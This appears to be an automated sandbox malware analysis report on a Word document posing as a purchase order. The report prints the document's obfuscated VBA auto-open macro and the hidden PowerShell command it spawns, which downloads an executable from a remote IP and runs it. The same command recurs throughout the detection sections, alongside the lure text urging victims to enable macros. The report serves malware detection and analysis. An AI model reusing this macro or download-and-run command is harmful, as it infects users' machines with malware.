

Analysis Report RFL_PO 69002.doc

Overview

General Information

Sample Name: RFL_PO 69002.doc
Analysis ID: 433026
MD5: ee4431e2c986dcac3fc8078c674ba65e
SHA1: 64aa75122963e38f52739ba819788e4bfcfb3651
SHA256: 4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
Tags: doc

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Sigma detected: Suspicious Bitsadmin Job via PowerShell

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2352 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2280 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2352, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 2280
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2352, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 2280
Sigma detected: Suspicious Bitsadmin Job via PowerShell
Source: Process started; Author: Endgame, JHasenbusch (ported to sigma for oscd.community); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2352, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe, ProcessId: 2280

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://31.210.20.45/1xBet/RFL_0769002.exe; Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: RFL_PO 69002.doc; Virustotal: Detection: 15%
Source: RFL_PO 69002.doc; ReversingLabs: Detection: 21%
Machine Learning detection for sample
Source: RFL_PO 69002.doc; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000002.00000002.2070730156.0000000002B30000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B00F2CD-537D-406E-B057-1B1541B1D39D}.tmp
Source: RFL_PO 69002.doc; String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex
Source: RFL_PO 69002.doc; String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex9
Source: powershell.exe, 00000002.00000002.2068494713.00000000000E0000.00000004.00000020.sdmp; String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe
Source: powershell.exe, 00000002.00000002.2068560577.0000000000193000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.2068695436.0000000000374000.00000004.00000040.sdmp; String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:
Source: powershell.exe, 00000002.00000002.2068535215.0000000000169000.00000004.00000020.sdmp; String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe2.exe
Source: powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 4; Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital O "g" ' 0' ' I WO"
Source: Document image extraction number: 0; Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 0; Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Document image extraction number: 1; Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 1; Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Document contains an embedded VBA macro which may execute processes
Source: RFL_PO 69002.doc; OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe"); Name: Document_Open
Document contains an embedded VBA macro with suspicious strings
Source: RFL_PO 69002.doc; OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101)); Name: Document_Open
Source: RFL_PO 69002.doc; OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function Document_Open; Name: Document_Open
Source: RFL_PO 69002.doc; OLE indicator, VBA macros: true
Source: classification engine; Classification label: mal84.expl.winDOC@3/6@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\Desktop\~$L_PO 69002.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRAD4E.tmp
Source: RFL_PO 69002.doc; OLE indicator, Word Document stream: true
Source: RFL_PO 69002.doc; OLE document summary: title field not present or empty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..................x...............................x.....................`I.........v.....................K..............4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.v.....................%.v......................u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File read: C:\Users\desktop.ini
Source: RFL_PO 69002.doc; Virustotal: Detection: 15%
Source: RFL_PO 69002.doc; ReversingLabs: Detection: 21%
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000002.00000002.2070730156.0000000002B30000.00000002.00000001.sdmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX (64 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (34 identical entries)
Source: RFL_PO 69002.doc; Stream path 'Data' entropy: 7.9926896989 (max. 8.0)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000002.00000002.2068506136.000000000011E000.00000004.00000020.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\hh.exe VolumeInformation

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Command and Scripting Interpreter 1 | Path Interception | Process Injection 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scripting 22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 21 | Security Account Manager | Virtualization/Sandbox Evasion 21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 1 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 22 | LSA Secrets | System Information Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |

(The number following a technique name is the report's count of matched signatures for that technique; techniques without a number were not observed.)

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
RFL_PO 69002.doc | 15% | Virustotal | 
RFL_PO 69002.doc | 22% | ReversingLabs | Script-Macro.Downloader.EncDoc
RFL_PO 69002.doc | 100% | Joe Sandbox ML | 

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://31.210.20.45/1xBet/RFL_0769002.exe | 7% | Virustotal | 
http://31.210.20.45/1xBet/RFL_0769002.exe | 0% | Avira URL Cloud | safe
http://31.210.20.45/1xBet/RFL_0769002.ex | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://31.210.20.45/1xBet/RFL_0769002.exe2.exe | 0% | Avira URL Cloud | safe
http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC: | 0% | Avira URL Cloud | safe
http://31.210.20.45/1xBet/RFL_0769002.ex9 | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://31.210.20.45/1xBet/RFL_0769002.exe | powershell.exe, 00000002.00000002.2068494713.00000000000E0000.00000004.00000020.sdmp | true | 7%, Virustotal; Avira URL Cloud: safe | unknown
http://31.210.20.45/1xBet/RFL_0769002.ex | RFL_PO 69002.doc | true | Avira URL Cloud: safe | unknown
http://www.%s.comPA | powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000002.00000002.2069410640.0000000002340000.00000002.00000001.sdmp | false |  | high
http://31.210.20.45/1xBet/RFL_0769002.exe2.exe | powershell.exe, 00000002.00000002.2068535215.0000000000169000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC: | powershell.exe, 00000002.00000002.2068560577.0000000000193000.00000004.00000020.sdmp; powershell.exe, 00000002.00000002.2068695436.0000000000374000.00000004.00000040.sdmp | true | Avira URL Cloud: safe | unknown
http://31.210.20.45/1xBet/RFL_0769002.ex9 | RFL_PO 69002.doc | false | Avira URL Cloud: safe | unknown

    Contacted IPs


    Public

    IP | Domain | Country | ASN | ASN Name | Malicious
    31.210.20.45 | unknown | Netherlands | 61157 | PLUSSERVER-ASN1, DE | true

    General Information

    Joe Sandbox Version:32.0.0 Black Diamond
    Analysis ID:433026
    Start date:11.06.2021
    Start time:07:35:25
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 27s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:RFL_PO 69002.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal84.expl.winDOC@3/6@0/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
    • Not all processes were analyzed; the report is missing behavior information
    • Report size getting too big, too many NtQueryAttributesFile calls found.

    Simulations

    Behavior and APIs

    Time | Type | Description
    07:35:31 | API Interceptor | 5x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    Match: 31.210.20.45
    Associated Sample Name / URL | Detection | Context
    BL & INV.doc | malicious | 31.210.20.45/1xBet/Corf4olpp3.exe
    Swift MT103 Transfer.xlsx | malicious | 31.210.20.45/10/nanno1.exe
    IMG_1741000.xlsx | malicious | 31.210.20.45/10/11222.exe

    Domains

    No context

    ASN

    Match: PLUSSERVER-ASN1, DE
    Associated Sample Name / URL | Detection | Context
    SKlGhwkzTi.exe | malicious | 151.106.118.75
    BL & INV.doc | malicious | 31.210.20.45
    BL & INV.doc | malicious | 31.210.20.45
    BL & INV.doc | malicious | 31.210.20.45
    8cuLxttsra.exe | malicious | 31.210.21.161
    Owbtvvu.exe | malicious | 31.210.20.60
    Inqquuirrryyy202106079768900100.exe | malicious | 31.210.21.188
    Swift MT103 Transfer.xlsx | malicious | 31.210.20.45
    inqqqqquiry9867120210406000900.exe | malicious | 31.210.21.188
    tzeEeC2CBA.exe | malicious | 151.106.118.75
    IMG_1741000.xlsx | malicious | 31.210.20.45
    QyKNw7NioL.exe | malicious | 151.106.118.75
    fMWJqYA8ae.exe | malicious | 151.106.118.75
    Compliance - Notice 06-03.xlsx | malicious | 151.106.118.75
    Request for Courtesy Call - Urgent.xlsx | malicious | 151.106.118.75
    Payment Advice Reference No SWT005262021.exe | malicious | 31.210.20.60
    Payment Advice Reference0000 docx.exe | malicious | 31.210.20.60
    BVYzIQc9Q3.exe | malicious | 31.210.21.63
    9XfX7aaf3F.exe | malicious | 151.106.118.75
    xhbUdeAoVP.exe | malicious | 151.106.118.75

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B00F2CD-537D-406E-B057-1B1541B1D39D}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFL_PO 69002.LNK
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Fri Jun 11 13:35:28 2021, length=428544, window=hide
    Category:dropped
    Size (bytes):2048
    Entropy (8bit):4.534020161128856
    Encrypted:false
    SSDEEP:24:8xI/XTwz6IkneeTiDv3qm1dM7dD2xI/XTwz6IkneeTiDv3qm1dM7dV:8e/XT3IkesgQh2e/XT3IkesgQ/
    MD5:2455AC4DF52F797740DEC91D5F3C1AB5
    SHA1:7CDE8C4527A05226D74EB0261FF01BBFBE54CDE6
    SHA-256:2DF13092BA870E6622E771E7F7D2D980413CA05F5A51241D14CED360483AFCFC
    SHA-512:364A97DAC69642E0C72B64B7B83CC3E372F820B8D262B1B3E617EA3FBB9D900E74453893F1FD98F5D19B594886DC28140D653F58F54DB22030CA5724BBE6D0C9
    Malicious:false
    Reputation:low
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):74
    Entropy (8bit):4.33010311570589
    Encrypted:false
    SSDEEP:3:M1w3pUlvQ13pUlmX1w3pUlv:MG3a9g3az3a1
    MD5:9B3055E12C4A9B6B0C8419746014048D
    SHA1:1441C0E1618E5C698EA50292509710036EBEDCAC
    SHA-256:C5696759D40368FD4CEF825F47831F2BBE3A0151AA60B75741286802C236D569
    SHA-512:105D4B682EAE59F6D1212680E5035EBB88780922A6492CFD1FAB291EEF9F21C1B9ECC0E5BDCFA35B4298465E22CE48CDAE7631FE2733260DA5AD2F53161E1ECA
    Malicious:false
    Reputation:low
    Preview: [doc]..RFL_PO 69002.LNK=0..RFL_PO 69002.LNK=0..[doc]..RFL_PO 69002.LNK=0..
    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.431160061181642
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
